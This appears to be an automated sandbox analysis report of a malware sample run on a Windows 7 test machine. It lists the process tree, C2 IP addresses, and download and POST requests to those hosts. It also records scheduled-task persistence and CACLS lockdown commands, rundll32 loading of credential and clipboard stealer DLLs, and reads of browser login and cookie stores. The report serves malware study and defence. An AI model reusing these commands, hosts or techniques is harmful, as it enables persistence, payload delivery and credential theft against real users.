Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Feb. 19, 2023, 2:01 p.m. | Feb. 19, 2023, 2:04 p.m. |
-
-
-
-
-
iWr34lU.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\iWr34lU.exe
2228 -
kQu23BE.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\kQu23BE.exe
2684
-
-
leW63TH.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\leW63TH.exe
2728
-
-
-
AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3044
-
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
296 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit
2596-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2224 -
cacls.exe CACLS "mnolyk.exe" /P "test22:N"
524 -
cacls.exe CACLS "mnolyk.exe" /P "test22:R" /E
2672 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2852 -
cacls.exe CACLS "..\4f9dd6f8a7" /P "test22:N"
2924 -
cacls.exe CACLS "..\4f9dd6f8a7" /P "test22:R" /E
2972
-
-
-
-
-
dNZ51dd.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\dNZ51dd.exe
2288 -
eTh66Ma.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\eTh66Ma.exe
3160
-
-
kFw24bl.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\kFw24bl.exe
3204
-
-
nBU16dI.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nBU16dI.exe
3472
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
2096 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit
1340-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3000 -
cacls.exe CACLS "nbveek.exe" /P "test22:N"
2872 -
cacls.exe CACLS "nbveek.exe" /P "test22:R" /E
2124 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3032 -
cacls.exe CACLS "..\9e0894bcc4" /P "test22:N"
2360 -
cacls.exe CACLS "..\9e0894bcc4" /P "test22:R" /E
2608
-
-
agent.exe "C:\Users\test22\AppData\Roaming\1000239000\agent.exe"
2704 -
-
Underglaze.exe C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe
2976
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
3768-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
3812
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
3852
-
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
3688
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
transfer.sh | 144.76.136.153 |
IP Address | Status | Action |
---|---|---|
144.76.136.153 | Active | Moloch |
164.124.101.2 | Active | Moloch |
176.113.115.17 | Active | Moloch |
193.233.20.15 | Active | Moloch |
193.233.20.16 | Active | Moloch |
193.233.20.17 | Active | Moloch |
45.32.218.145 | Active | Moloch |
62.204.41.245 | Active | Moloch |
62.204.41.88 | Active | Moloch |
79.110.62.167 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
pdb_path | wextract.pdb |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe |
resource name | AVI |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://193.233.20.15/dF30Hn4m/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://193.233.20.16/ti/truno.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://62.204.41.245/lebro.exe | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://62.204.41.88/9vdVVVjsw/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://79.110.62.167/link/agent.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://62.204.41.88/lend/Underglaze.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://193.233.20.15/dF30Hn4m/Plugins/cred64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://193.233.20.15/dF30Hn4m/Plugins/clip64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://62.204.41.88/9vdVVVjsw/Plugins/cred64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://62.204.41.88/9vdVVVjsw/Plugins/clip64.dll |
request | POST http://193.233.20.15/dF30Hn4m/index.php |
request | GET http://193.233.20.16/ti/truno.exe |
request | GET http://62.204.41.245/lebro.exe |
request | POST http://62.204.41.88/9vdVVVjsw/index.php |
request | GET http://79.110.62.167/link/agent.exe |
request | GET http://62.204.41.88/lend/Underglaze.exe |
request | GET http://193.233.20.15/dF30Hn4m/Plugins/cred64.dll |
request | GET http://193.233.20.15/dF30Hn4m/Plugins/clip64.dll |
request | GET http://62.204.41.88/9vdVVVjsw/Plugins/cred64.dll |
request | GET http://62.204.41.88/9vdVVVjsw/Plugins/clip64.dll |
request | POST http://193.233.20.15/dF30Hn4m/index.php |
request | POST http://62.204.41.88/9vdVVVjsw/index.php |
description | nbveek.exe tried to sleep 128 seconds, actually delayed analysis time by 128 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\kFw24bl.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\leW63TH.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\sCf07ZB.exe |
file | C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\dNZ51dd.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\nJM68XE.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\sLP46se.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nXi14fa28.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\rtJ58hE.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\iWr34lU.exe |
file | C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\nRK04uJ07.exe |
file | C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\slV42BL.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |
file | C:\Users\test22\AppData\Roaming\1000239000\agent.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\eTh66Ma.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nBU16dI.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\kQu23BE.exe |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit |
file | C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe |
file | C:\Users\test22\AppData\Roaming\1000239000\agent.exe |
file | C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe |
file | C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe |
file | C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll |
file | C:\Users\test22\AppData\Roaming\1000239000\agent.exe |
file | C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe |